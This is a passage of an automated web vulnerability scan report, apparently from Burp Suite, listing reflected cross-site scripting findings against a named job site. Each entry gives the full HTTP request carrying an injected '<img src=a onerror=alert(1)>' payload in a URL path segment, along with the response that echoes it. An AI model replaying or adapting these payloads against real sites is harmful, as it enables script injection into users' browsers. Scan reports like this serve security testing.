<body class="sites-all2a0d6"><img src=a onerror=alert(1)>14b10f530b0-modules-filefield-filefield.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.66. http://jobs.ctg.eu/sites/all/modules/filefield/filefield.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/filefield/filefield.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa6eb"><img%20src%3da%20onerror%3dalert(1)>14bd3227d0a was submitted in the REST URL parameter 3. This input was echoed as fa6eb"><img src=a onerror=alert(1)>14bd3227d0a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modulesfa6eb"><img%20src%3da%20onerror%3dalert(1)>14bd3227d0a/filefield/filefield.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:36:45 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:36:45 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modulesfa6eb"><img src=a onerror=alert(1)>14bd3227d0a-filefield-filefield.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.67. http://jobs.ctg.eu/sites/all/modules/filefield/filefield.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/filefield/filefield.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c98c"><img%20src%3da%20onerror%3dalert(1)>069115183be was submitted in the REST URL parameter 4. This input was echoed as 3c98c"><img src=a onerror=alert(1)>069115183be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/filefield3c98c"><img%20src%3da%20onerror%3dalert(1)>069115183be/filefield.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:38:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:38:21 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-filefield3c98c"><img src=a onerror=alert(1)>069115183be-filefield.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.68. http://jobs.ctg.eu/sites/all/modules/filefield/filefield.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/filefield/filefield.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1fd8"><img%20src%3da%20onerror%3dalert(1)>1fcab1747c6 was submitted in the REST URL parameter 5. This input was echoed as c1fd8"><img src=a onerror=alert(1)>1fcab1747c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/filefield/filefield.cssc1fd8"><img%20src%3da%20onerror%3dalert(1)>1fcab1747c6?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:40:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:40:13 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-filefield-filefield.cssc1fd8"><img src=a onerror=alert(1)>1fcab1747c6 not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.69. http://jobs.ctg.eu/sites/all/modules/logintoboggan/logintoboggan.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/logintoboggan/logintoboggan.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73224"><img%20src%3da%20onerror%3dalert(1)>9589d103583 was submitted in the REST URL parameter 1. This input was echoed as 73224"><img src=a onerror=alert(1)>9589d103583 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites73224"><img%20src%3da%20onerror%3dalert(1)>9589d103583/all/modules/logintoboggan/logintoboggan.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:33:16 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:33:17 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites73224"><img src=a onerror=alert(1)>9589d103583-all-modules-logintoboggan-logintoboggan.css not-front not-logged-in page-sites73224img-srca-onerroralert19589d103583 no-sidebars">
...[SNIP]...

3.70. http://jobs.ctg.eu/sites/all/modules/logintoboggan/logintoboggan.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/logintoboggan/logintoboggan.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 544ad"><img%20src%3da%20onerror%3dalert(1)>2a3d032736e was submitted in the REST URL parameter 2. This input was echoed as 544ad"><img src=a onerror=alert(1)>2a3d032736e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all544ad"><img%20src%3da%20onerror%3dalert(1)>2a3d032736e/modules/logintoboggan/logintoboggan.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:35:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:35:12 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all544ad"><img src=a onerror=alert(1)>2a3d032736e-modules-logintoboggan-logintoboggan.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.71. http://jobs.ctg.eu/sites/all/modules/logintoboggan/logintoboggan.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/logintoboggan/logintoboggan.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 790cb"><img%20src%3da%20onerror%3dalert(1)>671c6b10ccd was submitted in the REST URL parameter 3. This input was echoed as 790cb"><img src=a onerror=alert(1)>671c6b10ccd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules790cb"><img%20src%3da%20onerror%3dalert(1)>671c6b10ccd/logintoboggan/logintoboggan.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:37:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:37:05 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules790cb"><img src=a onerror=alert(1)>671c6b10ccd-logintoboggan-logintoboggan.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.72. http://jobs.ctg.eu/sites/all/modules/logintoboggan/logintoboggan.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/logintoboggan/logintoboggan.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12225"><img%20src%3da%20onerror%3dalert(1)>e7c4abc7d00 was submitted in the REST URL parameter 4. This input was echoed as 12225"><img src=a onerror=alert(1)>e7c4abc7d00 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/logintoboggan12225"><img%20src%3da%20onerror%3dalert(1)>e7c4abc7d00/logintoboggan.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:38:44 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:38:44 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-logintoboggan12225"><img src=a onerror=alert(1)>e7c4abc7d00-logintoboggan.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.73. http://jobs.ctg.eu/sites/all/modules/logintoboggan/logintoboggan.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/logintoboggan/logintoboggan.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 302e5"><img%20src%3da%20onerror%3dalert(1)>7ed5455b6be was submitted in the REST URL parameter 5. This input was echoed as 302e5"><img src=a onerror=alert(1)>7ed5455b6be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/logintoboggan/logintoboggan.css302e5"><img%20src%3da%20onerror%3dalert(1)>7ed5455b6be?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:40:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:40:40 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-logintoboggan-logintoboggan.css302e5"><img src=a onerror=alert(1)>7ed5455b6be not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.74. http://jobs.ctg.eu/sites/all/modules/views/css/views.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views/css/views.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f3d1"><img%20src%3da%20onerror%3dalert(1)>eea6370678e was submitted in the REST URL parameter 1. This input was echoed as 9f3d1"><img src=a onerror=alert(1)>eea6370678e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites9f3d1"><img%20src%3da%20onerror%3dalert(1)>eea6370678e/all/modules/views/css/views.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:31:56 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:31:56 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites9f3d1"><img src=a onerror=alert(1)>eea6370678e-all-modules-views-css-views.css not-front not-logged-in page-sites9f3d1img-srca-onerroralert1eea6370678e no-sidebars">
...[SNIP]...

3.75. http://jobs.ctg.eu/sites/all/modules/views/css/views.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views/css/views.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e296a"><img%20src%3da%20onerror%3dalert(1)>55f421ac453 was submitted in the REST URL parameter 2. This input was echoed as e296a"><img src=a onerror=alert(1)>55f421ac453 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/alle296a"><img%20src%3da%20onerror%3dalert(1)>55f421ac453/modules/views/css/views.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:33:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:33:10 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-alle296a"><img src=a onerror=alert(1)>55f421ac453-modules-views-css-views.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.76. http://jobs.ctg.eu/sites/all/modules/views/css/views.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views/css/views.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4f68"><img%20src%3da%20onerror%3dalert(1)>5a9f31570fe was submitted in the REST URL parameter 3. This input was echoed as d4f68"><img src=a onerror=alert(1)>5a9f31570fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modulesd4f68"><img%20src%3da%20onerror%3dalert(1)>5a9f31570fe/views/css/views.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:34:58 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:34:59 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modulesd4f68"><img src=a onerror=alert(1)>5a9f31570fe-views-css-views.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.77. http://jobs.ctg.eu/sites/all/modules/views/css/views.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views/css/views.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38029"><img%20src%3da%20onerror%3dalert(1)>d2997aa32cd was submitted in the REST URL parameter 4. This input was echoed as 38029"><img src=a onerror=alert(1)>d2997aa32cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/views38029"><img%20src%3da%20onerror%3dalert(1)>d2997aa32cd/css/views.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:36:51 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:36:52 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-views38029"><img src=a onerror=alert(1)>d2997aa32cd-css-views.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.78. http://jobs.ctg.eu/sites/all/modules/views/css/views.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views/css/views.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a641b"><img%20src%3da%20onerror%3dalert(1)>bebe5c861b9 was submitted in the REST URL parameter 5. This input was echoed as a641b"><img src=a onerror=alert(1)>bebe5c861b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /sites/all/modules/views/cssa641b"><img%20src%3da%20onerror%3dalert(1)>bebe5c861b9/views.css?L HTTP/1.1
Host: jobs.ctg.eu
Proxy-Connection: keep-alive
Referer: http://jobs.ctg.eu/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5fce01b171785c9633d86359009a9819=b1e5ef1d8fdf06cf8ea0e54f9fb13e22

Response

HTTP/1.1 404 Not Found
Date: Fri, 22 Apr 2011 16:38:30 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.2.14-0.dotdeb.0pw1
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Fri, 22 Apr 2011 16:38:30 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 6703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
<meta http-equ
...[SNIP]...
<body class="sites-all-modules-views-cssa641b"><img src=a onerror=alert(1)>bebe5c861b9-views.css not-front not-logged-in page-sites no-sidebars">
...[SNIP]...

3.79. http://jobs.ctg.eu/sites/all/modules/views/css/views.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jobs.ctg.eu
Path:   /sites/all/modules/views/css/views.css

Issue detail

